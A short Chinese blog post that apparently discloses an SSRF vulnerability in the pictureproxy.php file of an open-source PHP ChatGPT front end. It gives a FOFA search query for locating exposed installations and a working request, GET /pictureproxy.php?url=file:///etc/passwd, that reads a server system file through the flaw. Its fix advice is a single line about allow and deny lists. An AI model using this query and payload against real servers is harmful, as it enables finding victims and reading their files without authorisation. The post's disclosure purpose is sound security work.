chatgpt个人版ssrf漏洞

扣脚大汉在网络2024-09-17 18:32

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码 
title="ChatGPT个人专用版"

漏洞描述

该系统是一个开源的chatgpt系统,是PHP版调用OpenAI的API接口进行问答的模型,在prictureproxy.php文件处存在ssrf漏洞

漏洞复现

payload

yaml 复制代码 
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: x.x.x.x

修复建议

修改源代码,进行黑白名单

相关推荐
菩提小狗13 小时前
每日安全情报报告 · 2026-04-15
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗2 天前
每日安全情报报告 · 2026-04-14
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗3 天前
每日安全情报报告 · 2026-04-12
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗5 天前
每日安全情报报告 · 2026-04-11
网络安全·漏洞·cve·安全情报·每日安全
羌俊恩5 天前
Vim modeline 命令执行漏洞(CVE-2026-34714)修复指导
linux·编辑器·vim·漏洞·cve-2026-34714
菩提小狗5 天前
每日安全情报报告 · 2026-04-10
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗8 天前
每日安全情报报告 · 2026-04-07
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗9 天前
每日安全情报报告 · 2026-04-06
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗11 天前
每日安全情报报告 · 2026-04-05
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗11 天前
每日安全情报报告 · 2026-04-02
网络安全·漏洞·cve·安全情报·每日安全
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点03一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛04基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南05GPT-6核心能力解析及与现有主流大模型对比06零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)07GPT-6发布日深度解析-Symphony架构200万Token实战08从限购到畅通:GLM-5.1 Coding Plan接入攻略09AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析10免费!不限量!用opencode接入英伟达(NVIDIA)大模型,轻松打造你的 AI 编程助手